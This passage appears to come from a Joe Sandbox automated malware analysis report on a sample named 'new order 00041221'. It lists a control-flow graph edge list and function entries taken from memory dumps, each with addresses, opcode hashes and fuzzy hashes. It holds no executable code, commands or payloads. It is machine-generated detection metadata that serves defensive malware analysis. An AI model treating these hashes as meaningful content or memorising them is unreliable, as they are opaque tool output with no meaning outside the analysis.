127b122-127b125 3852->3856 3863 127b171-127b177 3853->3863 3864 127b19e-127b1a8 3853->3864 3883 127b494 3854->3883 3898 127b256-127b259 3854->3898 3859 127b1f7-127b1ff 3855->3859 3860 127b1f1-127b1f4 3855->3860 3856->3843 3857 127b12b-127b14a 3856->3857 3857->3843 3891 127b14c-127b152 3857->3891 3865 127b267-127b26e 3859->3865 3866 127b201-127b207 3859->3866 3860->3859 3863->3847 3870 127b179-127b196 3863->3870 3868 127b274-127b27b 3865->3868 3869 127b373-127b37c 3865->3869 3866->3865 3871 127b209-127b20f 3866->3871 3876 127b281-127b289 3868->3876 3877 127b32a-127b330 3868->3877 3874 127b386-127b389 3869->3874 3875 127b37e-127b384 3869->3875 3870->3864 3878 127b215-127b222 3871->3878 3879 127b499-127b4a9 3871->3879 3874->3883 3884 127b38f-127b39d 3874->3884 3875->3874 3882 127b3a0-127b3a4 3875->3882 3876->3883 3885 127b28f-127b298 3876->3885 3877->3879 3880 127b336-127b340 3877->3880 3878->3854 3878->3879 3895 127b50b-127b51a 3879->3895 3896 127b4ab-127b4cf 3879->3896 3880->3879 3890 127b346-127b362 3880->3890 3887 127b427-127b42b 3882->3887 3888 127b3aa-127b3b3 3882->3888 3883->3879 3884->3882 3885->3879 3893 127b29e-127b2d1 3885->3893 3899 127b42d-127b436 3887->3899 3900 127b48a-127b491 3887->3900 3888->3887 3894 127b3b5-127b3bb 3888->3894 3932 127b36a-127b36d 3890->3932 3891->3847 3897 127b154-127b158 3891->3897 3936 127b2d3 3893->3936 3937 127b31b-127b328 3893->3937 3894->3879 3903 127b3c1-127b3cb 3894->3903 3912 127b51c-127b527 3895->3912 3913 127b529-127b52b 3895->3913 3917 127b4d1-127b4dc 3896->3917 3918 127b4de-127b4e2 3896->3918 3897->3853 3898->3883 3905 127b25f-127b265 3898->3905 3899->3883 3906 127b438-127b43f 3899->3906 3903->3879 3910 127b3d1-127b3de 3903->3910 3905->3865 3905->3866 3906->3900 3909 127b441 3906->3909 3914 127b444-127b44c 3909->3914 3910->3879 3916 127b3e4-127b40f 3910->3916 3912->3913 3922 127b52d-127b53a call 127abe0 3913->3922 3923 127b559-127b56a 3913->3923 3920 127b480-127b483 3914->3920 3921 127b44e-127b45a 3914->3921 3916->3879 3953 127b415-127b41d 3916->3953 3917->3918 3924 127b4f4 3918->3924 3925 127b4e4-127b4f2 3918->3925 3920->3883 3934 127b485-127b488 3920->3934 3921->3879 3927 127b45c-127b478 3921->3927 3922->3923 3943 127b53c-127b54b 3922->3943 3933 127b4f6-127b4f8 3924->3933 3925->3933 3927->3920 3932->3869 3932->3883 3939 127b4fe-127b506 3933->3939 3940 127b4fa-127b4fc 3933->3940 3934->3900 3934->3914 3942 127b2d6-127b2dc 3936->3942 3937->3932 3939->3913 3945 127b508-127b50a 3939->3945 3940->3939 3942->3879 3946 127b2e2-127b303 3942->3946 3943->3923 3952 127b54d-127b557 3943->3952 3945->3895 3946->3883 3957 127b309-127b30d 3946->3957 3952->3923 3953->3883 3954 127b41f-127b425 3953->3954 3954->3887 3954->3894 3957->3883 3958 127b313-127b319 3957->3958 3958->3937 3958->3942
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 645a3a9b6f415b5334a4a9d9ce10b70753ba41d648c3b7520eff5943179a24be
                                            • Instruction ID: d16d78ae3f5b1ee50292ecb0bd12d79df176303155e61aea8dfa83caf968f583
                                            • Opcode Fuzzy Hash: 645a3a9b6f415b5334a4a9d9ce10b70753ba41d648c3b7520eff5943179a24be
                                            • Instruction Fuzzy Hash: 4F71A571B102158FCB15DF68D858AAFBBF6BFC8320B148169E516DB395DB319C02CB94
                                            Function 012780D8 Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3959 12780d8-1278117 3963 1278124-1278130 3959->3963 3964 1278119-1278122 3959->3964 3967 1278132-127813b 3963->3967 3968 127813d-1278143 3963->3968 3964->3963 3967->3968 3969 1278145-127814f call 12776a8 3968->3969 3970 127815c-1278162 3968->3970 3969->3970 3978 1278151-127815a 3969->3978 3973 1278164-127816e call 12776a8 3970->3973 3974 127817b-127818f 3970->3974 3973->3974 3980 1278170-1278179 3973->3980 3984 1278191-12781a5 3974->3984 3985 12781d8-12781dc 3974->3985 3978->3970 3980->3974 3984->3985 3999 12781a7-12781b3 3984->3999 3986 12781de-12781e2 3985->3986 3987 1278258-1278263 3985->3987 3986->3987 3989 12781e4-12781f1 3986->3989 4031 1278265 call 1278370 3987->4031 4032 1278265 call 1278380 3987->4032 3995 12781f3-12781fe 3989->3995 3996 1278200 3989->3996 3990 127826b-127826e 3991 1278270-1278273 3990->3991 3992 12782df-12782e6 3990->3992 3997 1278275-1278279 3991->3997 3998 12782be-12782cf 3991->3998 4000 1278202-1278204 3995->4000 3996->4000 4001 12782b6-12782bc 3997->4001 4002 127827b-127828c 3997->4002 4007 12782d1-12782d7 3998->4007 4008 12782d9-12782dc 3998->4008 3999->3985 4010 12781b5-12781c1 3999->4010 4000->3987 4004 1278206-1278213 4000->4004 4001->3992 4002->4001 4012 127828e-1278290 4002->4012 4014 1278215-1278220 4004->4014 4015 1278222 4004->4015 4007->3992 4008->3992 4010->3985 4020 12781c3-12781d3 4010->4020 4016 1278292-1278294 4012->4016 4017 127829e-12782a0 4012->4017 4021 1278224-1278226 4014->4021 4015->4021 4016->4017 4022 1278296-127829c 4016->4022 4018 12782a2-12782a4 4017->4018 4019 12782ae-12782b4 4017->4019 4018->4019 4023 12782a6-12782ac 4018->4023 4019->3992 4020->3992 4021->3987 4025 1278228-127822a 4021->4025 4022->3992 4023->3992 4025->3992 4027 1278230-127824c 4025->4027 4027->3987 4030 127824e-1278252 4027->4030 4030->3987 4030->3992 4031->3990 4032->3990
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e10c17fddafad5ee4fcdb307762117de08e5b0ca785eaba1ece12665274aaa1d
                                            • Instruction ID: 4ce26497f113d395f4726b9a736885de02d9ef771045138e95790b49090f28eb
                                            • Opcode Fuzzy Hash: e10c17fddafad5ee4fcdb307762117de08e5b0ca785eaba1ece12665274aaa1d
                                            • Instruction Fuzzy Hash: 94716C343206468FDB25DF6DD88CA6F7BE5AF49201B1900AAEA01DB3B1DB70DC41CB60
                                            Function 0127F5AF Relevance: .2, Instructions: 155COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c84b5bad94f987fe38172567863ecab25e48ee622d88884fac540cdb9d24260
                                            • Instruction ID: 43f4967554ee05ca7b9bacec7047670b920d769c56175962c364ab9daf2d13a0
                                            • Opcode Fuzzy Hash: 9c84b5bad94f987fe38172567863ecab25e48ee622d88884fac540cdb9d24260
                                            • Instruction Fuzzy Hash: BE611274D00318DFDB25DFA5D948BAEBBB2FF88300F608129E805AB294DB756946CF40
                                            Function 01279C30 Relevance: .2, Instructions: 151COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3c004e0857c70f29bcc1cc2801146eb38a76eac9d6ff734543bedb6ec79a4c3
                                            • Instruction ID: cc2f94719608702de350b0fadd95c364abbe3eefd51a14422dd2bcfde79efe59
                                            • Opcode Fuzzy Hash: f3c004e0857c70f29bcc1cc2801146eb38a76eac9d6ff734543bedb6ec79a4c3
                                            • Instruction Fuzzy Hash: 25515E307103069FDB15DF69D844BABBBE6EB88324F14846AEA09CB355D771CC42CBA1
                                            Function 0127D869 Relevance: .1, Instructions: 142COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 694d6ff068f95a3c44949eb59954ee6a207125bcffec927f1b2a0e5102a3b751
                                            • Instruction ID: 5e9d323038aa36c065f7c486773006dac5e47ca442a3f35215d1eaf26e861d84
                                            • Opcode Fuzzy Hash: 694d6ff068f95a3c44949eb59954ee6a207125bcffec927f1b2a0e5102a3b751
                                            • Instruction Fuzzy Hash: 9051A474E11218DFDB54DFAAD88499DBBF2FF89310F208169E809AB365DB31A901CF50
                                            Function 012741A0 Relevance: .1, Instructions: 134COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e44fd41b79c4fc0c521171cac2bbae52e757ccdcbb6007eedf06ea67ded957cd
                                            • Instruction ID: 87cfc8d3a42c0c8173df361977e03f469f73fa245875db64e7150fd04ce1aefe
                                            • Opcode Fuzzy Hash: e44fd41b79c4fc0c521171cac2bbae52e757ccdcbb6007eedf06ea67ded957cd
                                            • Instruction Fuzzy Hash: 9E51A875E01218CFCB18EFA9D48499DBBF6FF89300B209569E815AB324DB31AD42CF50
                                            Function 0127A303 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ec916d7c7e560e8e500cba2aaab1ecde753d8cf7970e6294b122987639f4d54
                                            • Instruction ID: 6a76bf5d584182850d716fcb73c970834b41e50df42dd549b3bfc1c8f1adf244
                                            • Opcode Fuzzy Hash: 9ec916d7c7e560e8e500cba2aaab1ecde753d8cf7970e6294b122987639f4d54
                                            • Instruction Fuzzy Hash: CC41B431A10249DFCF12CFA8D858A9FBFB1FF85320F088555E9059B2A1D375D914CB60
                                            Function 01275658 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9693cd8e6c3d5ed66e4e722d20128e6492bc6d4a869ddd31eaf913c87414e19c
                                            • Instruction ID: 851d1685344fbbe91de52d54d1c99d0fca0c3c72e841a2497a019a64b03901a9
                                            • Opcode Fuzzy Hash: 9693cd8e6c3d5ed66e4e722d20128e6492bc6d4a869ddd31eaf913c87414e19c
                                            • Instruction Fuzzy Hash: D4316E3131011ADFCF169F68E858AAFBBF2FB48201F004428FA159B395DB75D965CBA1
                                            Function 01278370 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c259199432c646386f5bb0d8ac1d2d10ebe5a0c7e107319461d4cd8a8cc2d3a6
                                            • Instruction ID: 09d3301cb88ab07f6b4e691772487b3694f8ef34b1d8796a96715eb286ead22e
                                            • Opcode Fuzzy Hash: c259199432c646386f5bb0d8ac1d2d10ebe5a0c7e107319461d4cd8a8cc2d3a6
                                            • Instruction Fuzzy Hash: 4721B2303202028BDB261779947C63F6AE6EFC4759714406ED646CB25AEAB5C842D381
                                            Function 01278380 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0aa74dded5791efb40db1bb5829d6fa3e58297f392b51caa1cddd2526eedbfaa
                                            • Instruction ID: 9eecf470e83c419d9b155bb27f1ffd409a6ac0de7610a7c1fea36135d06bceed
                                            • Opcode Fuzzy Hash: 0aa74dded5791efb40db1bb5829d6fa3e58297f392b51caa1cddd2526eedbfaa
                                            • Instruction Fuzzy Hash: 482192303202128BEB255669947C73F66D7EFC4759F14803DD606CB799EEB5CC829381
                                            Function 012762F0 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d26295a7d3143f7c4efb09d664aff36fac6c12bf229bdaf781a2d329151f1ea
                                            • Instruction ID: 2a5abf6b30c4d47cb163460c536c0108cfaf0df61c401eef0c110e990dfa3273
                                            • Opcode Fuzzy Hash: 9d26295a7d3143f7c4efb09d664aff36fac6c12bf229bdaf781a2d329151f1ea
                                            • Instruction Fuzzy Hash: EE21F235314A128FEB269B29D45852FBBA2FFC9B513048169E916CF798CF30CC02CB80
                                            Function 012728F0 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba526a730a9657325ebeedf48ed06575d6983ec216d67c47686e45430d73aa85
                                            • Instruction ID: b39ed9c1903b542031f201c281c83e43e28586d6acf463c2a81a80117312e6f6
                                            • Opcode Fuzzy Hash: ba526a730a9657325ebeedf48ed06575d6983ec216d67c47686e45430d73aa85
                                            • Instruction Fuzzy Hash: C8218135E00215DFCF15DF28C440AAF7BA5EB99360B648519E91A9B388DB31EE42CBD1
                                            Function 0120D468 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3708841187.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_120d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56a0346c7421ff02f42816400ced3bbf12be7d1dafb3c7f768eb73518cea7241
                                            • Instruction ID: c00452f66d0cb811ddc68ff00f2b8de30299027e7ff3666f2105bed529f49ad6
                                            • Opcode Fuzzy Hash: 56a0346c7421ff02f42816400ced3bbf12be7d1dafb3c7f768eb73518cea7241
                                            • Instruction Fuzzy Hash: D4213671515208DFDB06DF94E9C0B16BF65FB84324F20C669ED090A297C336D406CAA2
                                            Function 0121D044 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3709076164.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_121d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0f5b82d21e1c544461d118ae795f2398517e6ca88d5752dced2ece11abe681d
                                            • Instruction ID: 8bd0b034db07be5214e52f7e10782624b8d1b022188719f552b66e8f69b37ceb
                                            • Opcode Fuzzy Hash: c0f5b82d21e1c544461d118ae795f2398517e6ca88d5752dced2ece11abe681d
                                            • Instruction Fuzzy Hash: 0F214271614208DFDB14DF64C8C8B22BBA1FB94314F20C6ADE9490B24AC777D847CA62
                                            Function 01275649 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 232476715f016bc8f5633a3bb039f84c001e059160d58d7592d0df6a712e42c3
                                            • Instruction ID: b19a3c1fbd85f0fc80525109f48ee95cfcdaeb25238ea827acddc7c1da2c0954
                                            • Opcode Fuzzy Hash: 232476715f016bc8f5633a3bb039f84c001e059160d58d7592d0df6a712e42c3
                                            • Instruction Fuzzy Hash: 7321CF3162524A9FCF16AF28E44866BBBF2FB55210F004469F9058F356CB34CD65CBA1
                                            Function 01279761 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 196cee7e3ae294330cd77e745f258ef683c5e403b6f26792681d7a5974e17fd3
                                            • Instruction ID: 348f78bc8c4c4c18c600c76ee508354bea57bfbb05a2c7b038495a51b3580c71
                                            • Opcode Fuzzy Hash: 196cee7e3ae294330cd77e745f258ef683c5e403b6f26792681d7a5974e17fd3
                                            • Instruction Fuzzy Hash: 07218B70E01249DFDF19CFA6E550AEEBFB6EF49314F248059E500AA294DB30D981DB20
                                            Function 01276300 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52c7963afde9367302bd260c9eb0b40e4e47240f616652c49e2dfcb0543e8790
                                            • Instruction ID: 9a500227bfa48a6621aefc66fad037ce2644c6777e2719e92da5acb39a73a0e5
                                            • Opcode Fuzzy Hash: 52c7963afde9367302bd260c9eb0b40e4e47240f616652c49e2dfcb0543e8790
                                            • Instruction Fuzzy Hash: 4D118235311A129FEB255B2AD45892F7BE6FFC5B613094168EA16CB764CF31DC02C790
                                            Function 0127F4D0 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c362cec69182cdcd0ef0a27d6cab735edccc2b1f3c0ab616f5f8fd80053cb935
                                            • Instruction ID: e81ecea319b3c28fdf5a1deb6e7f426ebbf600922f804da1bdf3d555c743d29f
                                            • Opcode Fuzzy Hash: c362cec69182cdcd0ef0a27d6cab735edccc2b1f3c0ab616f5f8fd80053cb935
                                            • Instruction Fuzzy Hash: E4218CB4D10219DFEB15EFA9E54079FBFF2FB84304F0086A9D1199B259EB305A069F81
                                            Function 012727F0 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9d864ee0258a152e83e2affcdd5b6664be5d89e7be56fee0763742b987a834b
                                            • Instruction ID: 72765fe377a75a1f206e0d74de0f1df03725fceae4ca4ce8744003de087309bf
                                            • Opcode Fuzzy Hash: b9d864ee0258a152e83e2affcdd5b6664be5d89e7be56fee0763742b987a834b
                                            • Instruction Fuzzy Hash: 1221BD74D1421ACFCB00EFA9D8495EEBBF4FF0A310F10466AD809B6214EB355A85CFA1
                                            Function 0120D463 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3708841187.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_120d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction ID: 84dc4f6d6c83e6f283a4fae14412ef34ca62cdea1307c9cf94ba276025a38cd5
                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction Fuzzy Hash: FF11B176505244CFCB16CF54E5C4B16BF72FB84328F2486A9DD490B297C336D45ACBA2
                                            Function 0127F4E0 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c91080ac816c3c26697a514b659444b66b74fa28c2729c6537dfbd5e0147b7f
                                            • Instruction ID: e9746a7885dc377e1326716a26303c2cf971fd36c187493f6372df41055ec7bc
                                            • Opcode Fuzzy Hash: 0c91080ac816c3c26697a514b659444b66b74fa28c2729c6537dfbd5e0147b7f
                                            • Instruction Fuzzy Hash: D3115E74D0021ADFEB14EFB9D544B9EBBF2FB44300F0086A9D1199B259EB706E069F81
                                            Function 0121D03F Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3709076164.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_121d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: acb03f77ac397f711157902e8f8ae122c7e6ad81f61b8a816c1ef312117f1b13
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 7311D075504244CFCB16CF64C5C4B15BFA2FB44314F24C6ADD9494B256C33AD44ACF51
                                            Function 01275E98 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea818ad55184e305d1228c226bda15d860bf855766467539420a144863c434eb
                                            • Instruction ID: 75259fc58ea4a7ce62e9993330e389627fef085fe7f87f8ba4454389b24720ec
                                            • Opcode Fuzzy Hash: ea818ad55184e305d1228c226bda15d860bf855766467539420a144863c434eb
                                            • Instruction Fuzzy Hash: 700128327112166FCB52CFA89804AFF7FE7EBC9250F04C02AF505D7284DA758C168790
                                            Function 0127EB79 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33fb1a26db7e6bcac610c49cdffdae16651e42ec2375d678d916c53140fad631
                                            • Instruction ID: 8d3d2dbd32b5c6befe112ac033ebcb92f0656a9b7a43813408c037088b64d7de
                                            • Opcode Fuzzy Hash: 33fb1a26db7e6bcac610c49cdffdae16651e42ec2375d678d916c53140fad631
                                            • Instruction Fuzzy Hash: 2F116D78D0020AAFCB41DFB8E8549AEBBB1FB49300F104665E914A3354D7355915DF91
                                            Function 0127ABE0 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9422df10d093317dd149245d9694aab6c51741ec4a67d4889bbd49a15994cb5
                                            • Instruction ID: dd3cc4795c4817bd27d52f5da41f9cc531e8111e9c6b856243cf07482801fd08
                                            • Opcode Fuzzy Hash: b9422df10d093317dd149245d9694aab6c51741ec4a67d4889bbd49a15994cb5
                                            • Instruction Fuzzy Hash: A9F0F6313102115B9B265A2E9458A2FBADEEFC9A7130D407EEB06CB365EE31CC028380
                                            Function 01279C2C Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f413570f6b96903d00cb1ad3ac8cccc6fa32e1de4945b7247250cc7f0f58afe4
                                            • Instruction ID: 586659de019ecfed9a8066d521476ed8abf094e1422f01971f583581e2d39879
                                            • Opcode Fuzzy Hash: f413570f6b96903d00cb1ad3ac8cccc6fa32e1de4945b7247250cc7f0f58afe4
                                            • Instruction Fuzzy Hash: B6F08C32A10218AFCF10DF69E808AEEBBF5EBC8324F00C02AE908C7214D3714A558B90
                                            Function 012728A2 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d2ea0b4bede9b563818211801c8a2c2f3dcf2981e60b6fa2b0eb9ae1cc8715d5
                                            • Instruction ID: 756106c4fabba35a847f715a741779f6eff83dc721d9583ce295b3aa05467a11
                                            • Opcode Fuzzy Hash: d2ea0b4bede9b563818211801c8a2c2f3dcf2981e60b6fa2b0eb9ae1cc8715d5
                                            • Instruction Fuzzy Hash: CBE0DF35D54326CBC711EBB09C400EEFB34AE86321B58866BC42537190EB345669C7A1
                                            Function 01276739 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8351f7986d47f9ee80c20893f1aeafb282d5f431699a064e5ed4b3e7d67e3062
                                            • Instruction ID: 7e64bbb4661c0c517d314be9e354e087a26b033c9064990d8b1ebada090faccd
